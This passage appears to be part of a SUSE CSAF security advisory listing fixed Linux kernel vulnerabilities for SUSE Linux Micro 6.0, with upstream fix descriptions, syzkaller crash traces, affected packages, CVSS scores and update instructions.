00007f108cae4469\n[ 139.196586] RDX: 00007fff875883b0 RSI: 00007fff875883d1 RDI: 00007fff875883b6\n[ 139.201716] RBP: 00007fff8758c530 R08: 0000000000000001 R09: 00007fff8758c618\n[ 139.207940] R10: 0000000000000006 R11: 0000000000000286 R12: 00000000004004c0\n[ 139.214007] R13: 00007fff8758c610 R14: 0000000000000000 R15\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54125",
"url": "https://www.suse.com/security/cve/CVE-2023-54125"
},
{
"category": "external",
"summary": "SUSE Bug 1256117 for CVE-2023-54125",
"url": "https://bugzilla.suse.com/1256117"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54125"
},
{
"cve": "CVE-2023-54127",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54127"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nfs/jfs: prevent double-free in dbUnmount() after failed jfs_remount()\n\nSyzkaller reported the following issue:\n==================================================================\nBUG: KASAN: double-free in slab_free mm/slub.c:3787 [inline]\nBUG: KASAN: double-free in __kmem_cache_free+0x71/0x110 mm/slub.c:3800\nFree of addr ffff888086408000 by task syz-executor.4/12750\n[...]\nCall Trace:\n \u003cTASK\u003e\n[...]\n kasan_report_invalid_free+0xac/0xd0 mm/kasan/report.c:482\n ____kasan_slab_free+0xfb/0x120\n kasan_slab_free include/linux/kasan.h:177 [inline]\n slab_free_hook mm/slub.c:1781 [inline]\n slab_free_freelist_hook+0x12e/0x1a0 mm/slub.c:1807\n slab_free mm/slub.c:3787 [inline]\n __kmem_cache_free+0x71/0x110 mm/slub.c:3800\n dbUnmount+0xf4/0x110 fs/jfs/jfs_dmap.c:264\n jfs_umount+0x248/0x3b0 fs/jfs/jfs_umount.c:87\n jfs_put_super+0x86/0x190 fs/jfs/super.c:194\n generic_shutdown_super+0x130/0x310 fs/super.c:492\n kill_block_super+0x79/0xd0 fs/super.c:1386\n deactivate_locked_super+0xa7/0xf0 fs/super.c:332\n cleanup_mnt+0x494/0x520 fs/namespace.c:1291\n task_work_run+0x243/0x300 kernel/task_work.c:179\n resume_user_mode_work include/linux/resume_user_mode.h:49 [inline]\n exit_to_user_mode_loop+0x124/0x150 kernel/entry/common.c:171\n exit_to_user_mode_prepare+0xb2/0x140 kernel/entry/common.c:203\n __syscall_exit_to_user_mode_work kernel/entry/common.c:285 [inline]\n syscall_exit_to_user_mode+0x26/0x60 kernel/entry/common.c:296\n do_syscall_64+0x49/0xb0 arch/x86/entry/common.c:86\n entry_SYSCALL_64_after_hwframe+0x63/0xcd\n[...]\n \u003c/TASK\u003e\n\nAllocated by task 13352:\n kasan_save_stack mm/kasan/common.c:45 [inline]\n kasan_set_track+0x3d/0x60 mm/kasan/common.c:52\n ____kasan_kmalloc mm/kasan/common.c:371 [inline]\n __kasan_kmalloc+0x97/0xb0 mm/kasan/common.c:380\n kmalloc include/linux/slab.h:580 [inline]\n dbMount+0x54/0x980 fs/jfs/jfs_dmap.c:164\n jfs_mount+0x1dd/0x830 fs/jfs/jfs_mount.c:121\n jfs_fill_super+0x590/0xc50 fs/jfs/super.c:556\n mount_bdev+0x26c/0x3a0 fs/super.c:1359\n legacy_get_tree+0xea/0x180 fs/fs_context.c:610\n vfs_get_tree+0x88/0x270 fs/super.c:1489\n do_new_mount+0x289/0xad0 fs/namespace.c:3145\n do_mount fs/namespace.c:3488 [inline]\n __do_sys_mount fs/namespace.c:3697 [inline]\n __se_sys_mount+0x2d3/0x3c0 fs/namespace.c:3674\n do_syscall_x64 arch/x86/entry/common.c:50 [inline]\n do_syscall_64+0x3d/0xb0 arch/x86/entry/common.c:80\n entry_SYSCALL_64_after_hwframe+0x63/0xcd\n\nFreed by task 13352:\n kasan_save_stack mm/kasan/common.c:45 [inline]\n kasan_set_track+0x3d/0x60 mm/kasan/common.c:52\n kasan_save_free_info+0x27/0x40 mm/kasan/generic.c:518\n ____kasan_slab_free+0xd6/0x120 mm/kasan/common.c:236\n kasan_slab_free include/linux/kasan.h:177 [inline]\n slab_free_hook mm/slub.c:1781 [inline]\n slab_free_freelist_hook+0x12e/0x1a0 mm/slub.c:1807\n slab_free mm/slub.c:3787 [inline]\n __kmem_cache_free+0x71/0x110 mm/slub.c:3800\n dbUnmount+0xf4/0x110 fs/jfs/jfs_dmap.c:264\n jfs_mount_rw+0x545/0x740 fs/jfs/jfs_mount.c:247\n jfs_remount+0x3db/0x710 fs/jfs/super.c:454\n reconfigure_super+0x3bc/0x7b0 fs/super.c:935\n vfs_fsconfig_locked fs/fsopen.c:254 [inline]\n __do_sys_fsconfig fs/fsopen.c:439 [inline]\n __se_sys_fsconfig+0xad5/0x1060 fs/fsopen.c:314\n do_syscall_x64 arch/x86/entry/common.c:50 [inline]\n do_syscall_64+0x3d/0xb0 arch/x86/entry/common.c:80\n entry_SYSCALL_64_after_hwframe+0x63/0xcd\n[...]\n\nJFS_SBI(ipbmap-\u003ei_sb)-\u003ebmap wasn\u0027t set to NULL after kfree() in\ndbUnmount().\n\nSyzkaller uses faultinject to reproduce this KASAN double-free\nwarning. The issue is triggered if either diMount() or dbMount() fail\nin jfs_remount(), since diUnmount() or dbUnmount() already happened in\nsuch a case - they will do double-free on next execution: jfs_umount\nor jfs_remount.\n\nTested on both upstream and jfs-next by syzkaller.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54127",
"url": "https://www.suse.com/security/cve/CVE-2023-54127"
},
{
"category": "external",
"summary": "SUSE Bug 1256119 for CVE-2023-54127",
"url": "https://bugzilla.suse.com/1256119"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54127"
},
{
"cve": "CVE-2023-54133",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54133"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnfp: clean mc addresses in application firmware when closing port\n\nWhen moving devices from one namespace to another, mc addresses are\ncleaned in software while not removed from application firmware. Thus\nthe mc addresses are remained and will cause resource leak.\n\nNow use `__dev_mc_unsync` to clean mc addresses when closing port.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54133",
"url": "https://www.suse.com/security/cve/CVE-2023-54133"
},
{
"category": "external",
"summary": "SUSE Bug 1256104 for CVE-2023-54133",
"url": "https://bugzilla.suse.com/1256104"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54133"
},
{
"cve": "CVE-2023-54134",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54134"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nautofs: fix memory leak of waitqueues in autofs_catatonic_mode\n\nSyzkaller reports a memory leak:\n\nBUG: memory leak\nunreferenced object 0xffff88810b279e00 (size 96):\n comm \"syz-executor399\", pid 3631, jiffies 4294964921 (age 23.870s)\n hex dump (first 32 bytes):\n 00 00 00 00 00 00 00 00 08 9e 27 0b 81 88 ff ff ..........\u0027.....\n 08 9e 27 0b 81 88 ff ff 00 00 00 00 00 00 00 00 ..\u0027.............\n backtrace:\n [\u003cffffffff814cfc90\u003e] kmalloc_trace+0x20/0x90 mm/slab_common.c:1046\n [\u003cffffffff81bb75ca\u003e] kmalloc include/linux/slab.h:576 [inline]\n [\u003cffffffff81bb75ca\u003e] autofs_wait+0x3fa/0x9a0 fs/autofs/waitq.c:378\n [\u003cffffffff81bb88a7\u003e] autofs_do_expire_multi+0xa7/0x3e0 fs/autofs/expire.c:593\n [\u003cffffffff81bb8c33\u003e] autofs_expire_multi+0x53/0x80 fs/autofs/expire.c:619\n [\u003cffffffff81bb6972\u003e] autofs_root_ioctl_unlocked+0x322/0x3b0 fs/autofs/root.c:897\n [\u003cffffffff81bb6a95\u003e] autofs_root_ioctl+0x25/0x30 fs/autofs/root.c:910\n [\u003cffffffff81602a9c\u003e] vfs_ioctl fs/ioctl.c:51 [inline]\n [\u003cffffffff81602a9c\u003e] __do_sys_ioctl fs/ioctl.c:870 [inline]\n [\u003cffffffff81602a9c\u003e] __se_sys_ioctl fs/ioctl.c:856 [inline]\n [\u003cffffffff81602a9c\u003e] __x64_sys_ioctl+0xfc/0x140 fs/ioctl.c:856\n [\u003cffffffff84608225\u003e] do_syscall_x64 arch/x86/entry/common.c:50 [inline]\n [\u003cffffffff84608225\u003e] do_syscall_64+0x35/0xb0 arch/x86/entry/common.c:80\n [\u003cffffffff84800087\u003e] entry_SYSCALL_64_after_hwframe+0x63/0xcd\n\nautofs_wait_queue structs should be freed if their wait_ctr becomes zero.\nOtherwise they will be lost.\n\nIn this case an AUTOFS_IOC_EXPIRE_MULTI ioctl is done, then a new\nwaitqueue struct is allocated in autofs_wait(), its initial wait_ctr\nequals 2. After that wait_event_killable() is interrupted (it returns\n-ERESTARTSYS), so that \u0027wq-\u003ename.name == NULL\u0027 condition may be not\nsatisfied. Actually, this condition can be satisfied when\nautofs_wait_release() or autofs_catatonic_mode() is called and, what is\nalso important, wait_ctr is decremented in those places. Upon the exit of\nautofs_wait(), wait_ctr is decremented to 1. Then the unmounting process\nbegins: kill_sb calls autofs_catatonic_mode(), which should have freed the\nwaitqueues, but it only decrements its usage counter to zero which is not\na correct behaviour.\n\nedit:imk\nThis description is of course not correct. The umount performed as a result\nof an expire is a umount of a mount that has been automounted, it\u0027s not the\nautofs mount itself. They happen independently, usually after everything\nmounted within the autofs file system has been expired away. If everything\nhasn\u0027t been expired away the automount daemon can still exit leaving mounts\nin place. But expires done in both cases will result in a notification that\ncalls autofs_wait_release() with a result status. The problem case is the\nsummary execution of of the automount daemon. In this case any waiting\nprocesses won\u0027t be woken up until either they are terminated or the mount\nis umounted.\nend edit: imk\n\nSo in catatonic mode we should free waitqueues which counter becomes zero.\n\nedit: imk\nInitially I was concerned that the calling of autofs_wait_release() and\nautofs_catatonic_mode() was not mutually exclusive but that can\u0027t be the\ncase (obviously) because the queue entry (or entries) is removed from the\nlist when either of these two functions are called. Consequently the wait\nentry will be freed by only one of these functions or by the woken process\nin autofs_wait() depending on the order of the calls.\nend edit: imk",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54134",
"url": "https://www.suse.com/security/cve/CVE-2023-54134"
},
{
"category": "external",
"summary": "SUSE Bug 1256106 for CVE-2023-54134",
"url": "https://bugzilla.suse.com/1256106"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54134"
},
{
"cve": "CVE-2023-54135",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54135"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmaple_tree: fix potential out-of-bounds access in mas_wr_end_piv()\n\nCheck the write offset end bounds before using it as the offset into the\npivot array. This avoids a possible out-of-bounds access on the pivot\narray if the write extends to the last slot in the node, in which case the\nnode maximum should be used as the end pivot.\n\nakpm: this doesn\u0027t affect any current callers, but new users of mapletree\nmay encounter this problem if backported into earlier kernels, so let\u0027s\nfix it in -stable kernels in case of this.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54135",
"url": "https://www.suse.com/security/cve/CVE-2023-54135"
},
{
"category": "external",
"summary": "SUSE Bug 1256107 for CVE-2023-54135",
"url": "https://bugzilla.suse.com/1256107"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54135"
},
{
"cve": "CVE-2023-54136",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54136"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nserial: sprd: Fix DMA buffer leak issue\n\nRelease DMA buffer when _probe() returns failure to avoid memory leak.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54136",
"url": "https://www.suse.com/security/cve/CVE-2023-54136"
},
{
"category": "external",
"summary": "SUSE Bug 1256099 for CVE-2023-54136",
"url": "https://bugzilla.suse.com/1256099"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
